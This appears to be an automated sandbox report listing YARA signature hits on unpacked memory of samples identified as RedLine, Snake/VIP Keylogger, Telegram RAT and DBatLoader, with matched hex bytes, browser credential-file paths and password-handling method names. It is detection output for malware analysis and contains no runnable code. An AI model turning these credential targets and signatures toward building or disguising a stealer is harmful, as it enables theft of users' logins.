13.1.fpnevlzQ.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
13.2.fpnevlzQ.pif.21740000.5.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21740000.5.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
7.1.fpnevlzQ.pif.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
0.2.PWSW6GK3ZC.exe.237f278.0.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f830000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
10.1.fpnevlzQ.pif.400000.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
13.1.fpnevlzQ.pif.438038.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.1.fpnevlzQ.pif.400000.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
10.2.fpnevlzQ.pif.1f5411e6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
13.3.fpnevlzQ.pif.1d29f158.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.3.fpnevlzQ.pif.1d29f158.0.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
13.3.fpnevlzQ.pif.1d29f158.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
13.3.fpnevlzQ.pif.1d29f158.0.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
13.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x36084:$a1: get_encryptedPassword 0x36058:$a2: get_encryptedUsername 0x3611c:$a3: get_timePasswordChanged 0x36034:$a4: get_passwordField 0x3609a:$a5: set_encryptedPassword 0x35e67:$a7: get_logins 0x3163c:$a10: KeyLoggerEventArgs 0x3160b:$a11: KeyLoggerEventArgsEventHandler 0x35f3b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x402ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3f96d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3fbca:$a4: \Orbitum\User Data\Default\Login Data 0x405a9:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.21740000.5.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x33c02:$s1: UnHook 0x33b9e:$s2: SetHook 0x33bd7:$s3: CallNextHook 0x33b66:$s4: _hook
13.2.fpnevlzQ.pif.438038.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.1.fpnevlzQ.pif.438038.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
9.2.Qzlvenpf.PIF.211acbd8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
13.2.fpnevlzQ.pif.400000.1.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
10.2.fpnevlzQ.pif.438038.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
10.1.fpnevlzQ.pif.4dc8c8.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
7.3.fpnevlzQ.pif.2c39f308.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
0.2.PWSW6GK3ZC.exe.213cb7a8.9.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 0A 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
7.2.fpnevlzQ.pif.30cc0000.6.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.30cc0000.6.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.30cc0000.6.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.30cc0000.6.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x35164:$a1: get_encryptedPassword 0x35138:$a2: get_encryptedUsername 0x351fc:$a3: get_timePasswordChanged 0x35114:$a4: get_passwordField 0x3517a:$a5: set_encryptedPassword 0x34f47:$a7: get_logins 0x3071c:$a10: KeyLoggerEventArgs 0x306eb:$a11: KeyLoggerEventArgsEventHandler 0x3501b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3f3aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ea4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ecaa:$a4: \Orbitum\User Data\Default\Login Data 0x3f689:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.2de611e6.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x32ce2:$s1: UnHook 0x32c7e:$s2: SetHook 0x32cb7:$s3: CallNextHook 0x32c46:$s4: _hook
7.2.fpnevlzQ.pif.2de611e6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
7.2.fpnevlzQ.pif.2de611e6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x33564:$a1: get_encryptedPassword 0x33538:$a2: get_encryptedUsername 0x335fc:$a3: get_timePasswordChanged 0x33514:$a4: get_passwordField 0x3357a:$a5: set_encryptedPassword 0x33347:$a7: get_logins 0x2eb1c:$a10: KeyLoggerEventArgs 0x2eaeb:$a11: KeyLoggerEventArgsEventHandler 0x3341b:$a13: _encryptedPassword
7.2.fpnevlzQ.pif.2de611e6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3d7aa:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3ce4d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3d0aa:$a4: \Orbitum\User Data\Default\Login Data 0x3da89:$a5: \Kometa\User Data\Default\Login Data
7.2.fpnevlzQ.pif.2de611e6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x310e2:$s1: UnHook 0x3107e:$s2: SetHook 0x310b7:$s3: CallNextHook 0x31046:$s4: _hook
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3e4ca:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3db6d:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ddca:$a4: \Orbitum\User Data\Default\Login Data 0x3e7a9:$a5: \Kometa\User Data\Default\Login Data
13.2.fpnevlzQ.pif.1eeb02c6.3.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x31e02:$s1: UnHook 0x31d9e:$s2: SetHook 0x31dd7:$s3: CallNextHook 0x31d66:$s4: _hook
10.2.fpnevlzQ.pif.1f5402c6.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.fpnevlzQ.pif.1f5402c6.4.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
10.2.fpnevlzQ.pif.1f5402c6.4.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
10.2.fpnevlzQ.pif.1f5402c6.4.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x34284:$a1: get_encryptedPassword 0x34258:$a2: get_encryptedUsername 0x3431c:$a3: get_timePasswordChanged 0x34234:$a4: get_passwordField 0x3429a:$a5: set_encryptedPassword 0x34067:$a7: get_logins 0x2f83c:$a10: KeyLoggerEventArgs 0x2f80b:$a11: KeyLoggerEventArgsEventHandler 0x3413b:$a13: _encryptedPassword
